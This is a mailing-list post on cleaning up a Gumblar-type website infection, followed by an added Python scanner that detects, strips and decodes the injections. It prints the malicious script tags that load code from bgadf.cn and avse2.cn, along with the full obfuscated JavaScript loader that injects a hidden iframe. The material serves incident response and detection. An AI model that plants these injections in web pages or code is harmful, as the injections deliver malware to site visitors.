The recent attack on House of Fusion resulted in some useful information as to what you should look for.

In general, all or most of the files with the following extensions were affected:

    .cfm .cfml .htm .html .js

The following line of code was prepended to all files other than .js:

    <script src=http://bgadf.cn></script>

This was added to both unencrypted and encrypted files, meaning the cfide was affected. Luckily, the line was exactly as stated above with a new line after it. This allows for a global find/replace to remove it. Unfortunately, this seems to have killed my cfide/administrator, requiring me to replace it with a copy from another machine.

The .js files had the following line of code added:

    document.writeln ("<script src=\"http://bgadf.cn\"><\/script>");

Again, a search and replace was able to remove it across the board. An important note is that the .js files in the cfide (the ajax files) were affected and had to be repaired.

Finally, the following line of code was buried within at least one file:

    <script src=http://avse2.cn></script>

This may be from something else or it may be from the same attack. I did a global review of all script tags to see what may have been compromised.
Finally, the following js code was set to a few pages:

    function CBeKy(lFwuKN){ var TySUSIZW=new Function("ncX", "return 872821;");alert('NmTqOe');window.eval(); }
    function NTZS(hWal){
        var UHrvVQkw=6,fAgz=5;
        var qIMfd='72+0,126+0,122+2,136+4,116+2,130+4,121+1,38+2,142+4,126+0,120+0,139+1,124+4,73+1,58+4,38+2,124+4,121+1,126+0,123+3,124+4,139+1,73+1,57+3,38+2,117+3,133+1,136+4,120+0,121+1,136+4,73+1,57+3,38+2,122+2,136+4,116+2,130+4,121+1,117+3,133+1,136+4,120+0,121+1,136+4,73+1,57+3,38+2,138+0,136+4,',bSBxeEp=qIMfd.split(',');
        rZh='';
        for(HVMYENy=0;HVMYENy<bSBxeEp.length-1;HVMYENy++){ cAT=bSBxeEp[HVMYENy].split('+');kNRwj = parseInt(cAT[0]*fAgz)+parseInt(cAT[1]);kNRwj = parseInt(kNRwj)/UHrvVQkw;rZh += String.fromCharCode(kNRwj);}
        return rZh;
    }
    function QFuWuDkcLi(qno){ fff=op.split("66"); }
    function TeMgRVEQ(fYbPy){
        var IQWqANfWqP=7,eJEBZ=6;
        var gJQy='115+3,71+1,45+3,121+2,135+2,135+2,130+4,67+4,54+5,54+5,131+5,140+0,119+0,115+3,136+3,115+3,53+4,122+3,128+2,119+0,129+3,54+5,119+0,53+4,115+3,120+1,122+3,73+3,123+4,142+2,129+3,45+3,72+2,70+0,54+5,122+3,119+0,133+0,113+1,127+1,117+5,72+2,',macKV=gJQy.split(',');
        atI='';
        for(UneulXsVe=0;UneulXsVe<macKV.length-1;UneulXsVe++){ JaWNRsHd=macKV[UneulXsVe].split('+');rUw = parseInt(JaWNRsHd[0]*eJEBZ)+parseInt(JaWNRsHd[1]);rUw = parseInt(rUw)/IQWqANfWqP;atI += String.fromCharCode(rUw);}
        return atI;
    }
    function wDbgVQuF(jNQiDLa){ window.eval(); }
    document['wri5te'.replace(/[0-9]/,'')](NTZS('jiMm')+TeMgRVEQ('yNgMvmppl'));
    function JSV(EvRaoC){ alert('UlzqkcMIyh'); }
    function ZbpXNWbRF(gdGwIbxJ){ var BlYeMDbv=new Function("RVmHnKt", "return 849704;"); fff=op.split("66"); fff.op.replace("v"); }

This matches the pattern of the Gumblar virus. According to the notes on that virus, it modifies itself per site so the names of the functions/variables might be different. On the other hand, there are recognisable patterns that can be searched for.
A segment of the numbers above can be used as a search pattern:

    116+2,130+4,121+1
    71+1,45+3,121+2,135+2,135+2

etc. This inclusion was not as clean as the scripts mentioned above and caused errors in some of the content on the page where it was injected.

Many have suggested that the IIS ftp may have been compromised but that was not the case on my server. IIS FTP was not installed and I searched the registry for any reference to it. I also made sure that my filezilla install had all of its accounts mapped to non-executable directories, though there was no evidence of compromise. I sealed off all of the shares between my machine and any other on the network 'just in case'. I'm still not sure how the virus got on the system, but...

Finally, some of the sw*.exe files in the C:\ColdFusion8\db\slserver54\bin directory were compromised with a backdoor virus. I'm not sure if this is related but I cleaned that up as well.

Whatever happens, scan your whole system with multiple virus scanners. I installed malwarebytes and cureit along with my standard anti-virus software. Always good to get a second opinion.

http://www.malwarebytes.org/
http://www.freedrweb.com/cureit/

Oh, and powergrep. It's fantastic!

--
Michael Dinowitz (http://www.linkedin.com/in/mdinowitz)
President: House of Fusion (http://www.houseoffusion.com)
Publisher: Fusion Authority (http://www.fusionauthority.com)
Adobe Community Expert / Advanced Certified ColdFusion Professional
Yes, I am Mr. "bad boy" to everyone

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:326391
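The checks Michael describes (grep for the two literal script tags and the writeln line, grep for a run of "N+M," pairs, then a global find/replace of the exact lines) can be put into one small tool. The script below is an added example written for this thread; it is not Michael's code and not anything from the House of Fusion site. It assumes only what the post states: the three literal injection strings, the file extensions that were hit, and the two number-pair strings together with the multiplier/divisor constants (5/6 and 6/7) that appear in the NTZS and TeMgRVEQ functions quoted above. It goes one step beyond the post by re-implementing that decoder in Python, which lets a defender see what an obfuscated block expands to (here, a hidden 1x0 iframe that loads a further external URL) without ever running the injected JavaScript; the generic pair-run regex catches per-site renamed variants that a fixed segment such as 116+2,130+4,121+1 would miss.

```python
"""Added example (not from the post): find, strip and decode the injections
described in the House of Fusion cleanup message."""
import re
import tempfile
from pathlib import Path

# Injected lines exactly as reported in the post.
PREPENDED_TAG = "<script src=http://bgadf.cn></script>"
JS_WRITELN = r'document.writeln ("<script src=\"http://bgadf.cn\"><\/script>");'
BURIED_TAG = "<script src=http://avse2.cn></script>"

# The two obfuscated strings copied from the quoted NTZS / TeMgRVEQ functions.
GUMBLAR_PAIRS_1 = (
    "72+0,126+0,122+2,136+4,116+2,130+4,121+1,38+2,142+4,126+0,120+0,139+1,"
    "124+4,73+1,58+4,38+2,124+4,121+1,126+0,123+3,124+4,139+1,73+1,57+3,38+2,"
    "117+3,133+1,136+4,120+0,121+1,136+4,73+1,57+3,38+2,122+2,136+4,116+2,"
    "130+4,121+1,117+3,133+1,136+4,120+0,121+1,136+4,73+1,57+3,38+2,138+0,136+4,"
)
GUMBLAR_PAIRS_2 = (
    "115+3,71+1,45+3,121+2,135+2,135+2,130+4,67+4,54+5,54+5,131+5,140+0,119+0,"
    "115+3,136+3,115+3,53+4,122+3,128+2,119+0,129+3,54+5,119+0,53+4,115+3,120+1,"
    "122+3,73+3,123+4,142+2,129+3,45+3,72+2,70+0,54+5,122+3,119+0,133+0,113+1,"
    "127+1,117+5,72+2,"
)

# Generic Gumblar fingerprint: a quoted run of ten or more "N+M," pairs.
# The post suggests grepping for a fixed segment; this regex covers renamed
# variants too, since the encoding shape survives the per-site rewrite.
PAIR_RUN = re.compile(r"'(?:\d{1,3}\+\d{1,3},){10,}'")

MARKUP_EXTS = {".cfm", ".cfml", ".htm", ".html"}
# (signature name, extensions it was seen in, exact injected text)
SIGNATURES = [
    ("prepended_script_tag", MARKUP_EXTS, PREPENDED_TAG),
    ("js_writeln_injection", {".js"}, JS_WRITELN),
    ("buried_script_tag", MARKUP_EXTS | {".js"}, BURIED_TAG),
]


def scan_text(text, suffix):
    """Return the names of the known injection signatures found in text."""
    hits = [name for name, exts, needle in SIGNATURES
            if suffix.lower() in exts and needle in text]
    if PAIR_RUN.search(text):
        hits.append("gumblar_pair_string")
    return hits


def strip_known_injections(text, suffix):
    """Remove the exact known lines (the post's global find/replace).

    Only literal matches are removed, each with the newline that followed it.
    The obfuscated block is reported but left alone, because it was spliced
    into page content and needs a manual look. Returns (cleaned, removals).
    """
    removed = 0
    for _, exts, needle in SIGNATURES:
        if suffix.lower() not in exts:
            continue
        text, n = re.subn(re.escape(needle) + r"\r?\n?", "", text)
        removed += n
    return text, removed


def decode_pair_string(pairs, multiplier, divisor):
    """Re-implement the injected decoder: 'a+b' -> chr((a*multiplier+b)//divisor).

    Mirrors the quoted JS loop, which skips the empty element left by the
    trailing comma and truncates the division in String.fromCharCode.
    """
    out = []
    for item in pairs.split(",")[:-1]:
        a, b = item.split("+")
        out.append(chr((int(a) * multiplier + int(b)) // divisor))
    return "".join(out)


def scan_tree(root):
    """Walk root and map each affected file path to its signature list."""
    findings = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in MARKUP_EXTS | {".js"}:
            hits = scan_text(path.read_text(encoding="utf-8", errors="replace"),
                             path.suffix)
            if hits:
                findings[str(path)] = hits
    return findings


if __name__ == "__main__":
    # Constructed samples: an infected page and an infected ajax script.
    with tempfile.TemporaryDirectory() as tmp:
        (Path(tmp) / "index.cfm").write_text(PREPENDED_TAG + "\n<cfoutput>#now()#</cfoutput>\n")
        (Path(tmp) / "ajax.js").write_text(JS_WRITELN + "\nvar x = 1;\n")
        for path, hits in scan_tree(tmp).items():
            print(path, hits)
    # What the two quoted strings actually build (5/6 and 6/7 are the constants
    # named UHrvVQkw/fAgz and IQWqANfWqP/eJEBZ in the injected code).
    print(decode_pair_string(GUMBLAR_PAIRS_1, 5, 6) + decode_pair_string(GUMBLAR_PAIRS_2, 6, 7))
```

Point it at a copy of the web root and the cfide directory (the post notes the ajax .js files there were hit too), review the findings, and only then run the stripping pass; the decoder is worth running on any pair string you find, since the multiplier and divisor change per site and sit in plain sight next to the string.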